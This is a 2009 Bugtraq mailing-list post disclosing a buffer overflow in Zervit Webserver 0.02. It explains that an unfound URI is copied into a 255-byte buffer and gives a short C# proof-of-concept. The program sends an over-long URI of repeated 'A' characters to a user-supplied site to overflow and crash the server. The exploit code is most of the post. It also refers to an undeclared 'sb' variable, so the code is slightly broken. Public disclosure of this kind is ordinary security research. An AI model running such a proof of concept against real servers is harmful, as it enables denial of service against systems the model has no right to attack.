Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Zervit Webserver Buffer Overflow

From: ewizz () balcansecurity com
Date: 14 Apr 2009 21:22:26 -0000
#######  Zervit Webserver 0.02  Buffer Overflow 

########## By:      e.wiZz!

#########Site:   www.balcansecurity.com


######## Found with ServMeNot (world's sexiest fuzzer :P )



In the wild...

########################################################################################

######Vend0r site: http://www.ohloh.net/projects/mereo


/* When requested uri isn't found,it goes to char tmp[255],
and later it is used to output,you need 256 chars to overflow (check source "http.c") */

using System;
using System.IO;
using System.Net;
using System.Text;

class whatsoever
{
    static void Main()
    {
        // StringBuilder sb = new StringBuilder();

        //byte[] buf = new byte[8192];

        Console.WriteLine("Enter site: (http://localhost)");
        string sajt = Console.ReadLine();
        string uribad = 
"/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
        HttpWebRequest request = (HttpWebRequest)
           
            WebRequest.Create(sajt+uribad);

        HttpWebResponse response = (HttpWebResponse)
            request.GetResponse();
        // you shouldn't see response
        Console.WriteLine(sb.ToString());
    }
}
Previous By Date Next
Previous By Thread Next

Current thread: